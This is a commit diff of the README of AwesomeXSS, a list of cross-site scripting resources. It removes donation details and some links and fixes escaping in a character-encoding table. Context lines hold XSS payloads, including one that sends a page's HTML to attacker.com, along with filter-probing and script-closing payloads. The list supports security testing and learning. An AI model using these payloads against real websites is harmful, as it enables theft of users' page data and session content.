Compare commits
12 Commits
67e9f46258
...
9982704e7c
| Author | SHA1 | Date | |
|---|---|---|---|
|
9982704e7c | ||
|
|
628f5a9e88 | ||
|
|
7ede29a409 | ||
|
|
12e12f7003 | ||
|
|
512ee573e3 | ||
|
|
0cde32fae4 | ||
|
|
f0e0acfbcf | ||
|
|
9596ca7102 | ||
|
|
1dc39208e8 | ||
|
|
b58f48e278 | ||
|
|
80c142e56b | ||
|
|
37bfaa4886 |
24
README.md
24
README.md
@@ -1,14 +1,6 @@
|
||||
# AwesomeXSS
|
||||
This repository is a collection of Awesome XSS resources. Contributions are welcome and should be submitted via an issue.
|
||||
|
||||
### Donations
|
||||
You can encourage me to create more such amazing programs buy donating a few bucks.
|
||||
|
||||
- Paypal - [https://paypal.me/s0md3v](https://paypal.me/s0md3v) or `somdevika@gmail.com`
|
||||
- Credit/Debit Card - [https://www.buymeacoffee.com/s0md3v](https://www.buymeacoffee.com/s0md3v)
|
||||
|
||||
Do you want to sponsor the project and get mentioned here? Email me `s0md3v[at]gmail[dot]com`
|
||||
|
||||
### Awesome contents
|
||||
- [Challenges](https://github.com/s0md3v/AwesomeXSS#awesome-challenges)
|
||||
- [Reads & Presentations](https://github.com/s0md3v/AwesomeXSS#awesome-reads--presentations)
|
||||
@@ -32,18 +24,16 @@ Do you want to sponsor the project and get mentioned here? Email me `s0md3v[at]g
|
||||
### Awesome Challenges
|
||||
- [prompt.ml](https://prompt.ml)
|
||||
- [alf.nu/alert1](https://alf.nu/alert1)
|
||||
- [s-p-o-o-k-y.com](https://www.s-p-o-o-k-y.com)
|
||||
- [xss-game.appspot.com](https://xss-game.appspot.com)
|
||||
- [polyglot.innerht.ml](https://polyglot.innerht.ml)
|
||||
- [sudo.co.il/xss](http://sudo.co.il/xss)
|
||||
- [hack.me/t/XSS](https://hack.me/t/XSS)
|
||||
- [root-me.org](https://www.root-me.org/?page=recherche&lang=en&recherche=xss)
|
||||
- [chefsecure.com](https://chefsecure.com/courses/xss/challenges)
|
||||
- [wechall.net](https://www.wechall.net/challs/XSS)
|
||||
- [codelatte.id/labs/xss](https://codelatte.id/labs/xss)
|
||||
|
||||
### Awesome Reads & Presentations
|
||||
- [Bypassing XSS Detection Mechanisms](https://github.com/s0md3v/MyPapers/tree/master/Bypassing-XSS-detection-mechanisms)
|
||||
- [XSS in Sarahah](http://www.shawarkhan.com/2017/08/sarahah-xss-exploitation-tool.html)
|
||||
- [XSS in Facebook via PNG Content Type](https://whitton.io/articles/xss-on-facebook-via-png-content-types/)
|
||||
- [How I met your girlfriend](https://www.youtube.com/watch?v=fWk_rMQiDGc)
|
||||
- [How to Find 1,352 Wordpress XSS Plugin Vulnerabilities in one hour](https://www.youtube.com/watch?v=9ADubsByGos)
|
||||
@@ -52,7 +42,6 @@ Do you want to sponsor the project and get mentioned here? Email me `s0md3v[at]g
|
||||
|
||||
### Awesome Tools
|
||||
- [XSStrike](https://github.com/UltimateHackers/XSStrike)
|
||||
- [xsshunter.com](https://xsshunter.com)
|
||||
- [BeEF](https://github.com/beefproject/beef)
|
||||
- [JShell](https://github.com/UltimateHackers/JShell)
|
||||
|
||||
@@ -237,7 +226,6 @@ Array.from(document.getElementsByTagName("a")).forEach(function(i) {
|
||||
```html
|
||||
<svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">
|
||||
```
|
||||
A good compilation of advanced XSS exploits can be found [here](http://www.xss-payloads.com/payloads-list.html?a#category=all)
|
||||
|
||||
### Awesome Probing
|
||||
If nothing of this works, take a look at **Awesome Bypassing** section
|
||||
@@ -249,11 +237,11 @@ If the quotes are not being filtered, you can simply try payloads from **Awesome
|
||||
```
|
||||
variable = 'value' or variable = "value"
|
||||
```
|
||||
Now lets say single quotes (') are in use, in that case enter `x'd3v`. If it gets altered to `x\\'d3v`, try escaping the backslash (\) by adding a backslash to your probe i.e. `x\\'d3v`. If it works use the following payload:
|
||||
Now lets say single quotes (') are in use, in that case enter `x'd3v`. If it gets altered to `x\'d3v`, try escaping the backslash (\) by adding a backslash to your probe i.e. `x\'d3v`. If it works use the following payload:
|
||||
```
|
||||
\'-alert()//
|
||||
```
|
||||
But if it gets altered to `x\\\\'d3v`, the only thing you can try is closing the script tag itself by using
|
||||
But if it gets altered to `x\\\'d3v`, the only thing you can try is closing the script tag itself by using
|
||||
```
|
||||
</script><svg onload=alert()>
|
||||
```
|
||||
@@ -329,7 +317,7 @@ If the your dummy tags lands in the source code as it is, go for any of these pa
|
||||
|`#`|#|`#`|number sign|u+0023|\0023|\43|%23|
|
||||
|`$`|$|`$`|dollar sign|u+0024|\0024|\44|%24|
|
||||
|`%`|%|`%`|percent sign|u+0025|\0025|\45|%25|
|
||||
|`&`|`&|`&`|ampersand|u+0026|\0026|\46|%26|
|
||||
|`&`|&|`&`|ampersand|u+0026|\0026|\46|%26|
|
||||
|`'`|'|`'`|apostrophe|u+0027|\0027|\47|%27|
|
||||
|`(`|(|`(`|left parenthesis|u+0028|\0028|\50|%28|
|
||||
|`)`|)|`)`|right parenthesis|u+0029|\0029|\51|%29|
|
||||
@@ -340,14 +328,14 @@ If the your dummy tags lands in the source code as it is, go for any of these pa
|
||||
|`.`|.|`.`|full stop; period|u+002E|\002e|\56|%2E|
|
||||
|`/`|/|`/`|solidus; slash|u+002F|\002f|\57|%2F|
|
||||
|`:`|:|`:`|colon|u+003A|\003a|\72|%3A|
|
||||
|`;`|;`|`;`|semicolon|u+003B|\003b|\73|%3B|
|
||||
|`;`|;|`;`|semicolon|u+003B|\003b|\73|%3B|
|
||||
|`<`|<|`<`|less-than|u+003C|\003c|\74|%3C|
|
||||
|`=`|=|`=`|equals|u+003D|\003d|\75|%3D|
|
||||
|`>`|>|`>`|greater-than sign|u+003E|\003e|\76|%3E|
|
||||
|`?`|?|`?`|question mark|u+003F|\003f|\77|%3F|
|
||||
|`@`|@|`@`|at sign; commercial at|u+0040|\0040|\100|%40|
|
||||
|`[`|\[|`[`|left square bracket|u+005B|\005b|\133|%5B|
|
||||
|`\`|/|`\`|backslash|u+005C|\005c|\134|%5C|
|
||||
|`\`|\|`\`|backslash|u+005C|\005c|\134|%5C|
|
||||
|`]`|]|`]`|right square bracket|u+005D|\005d|\135|%5D|
|
||||
|`^`|^|`^`|circumflex accent|u+005E|\005e|\136|%5E|
|
||||
|`_`|_|`_`|low line|u+005F|\005f|\137|%5F|
|
||||
|
||||
Reference in New Issue
Block a user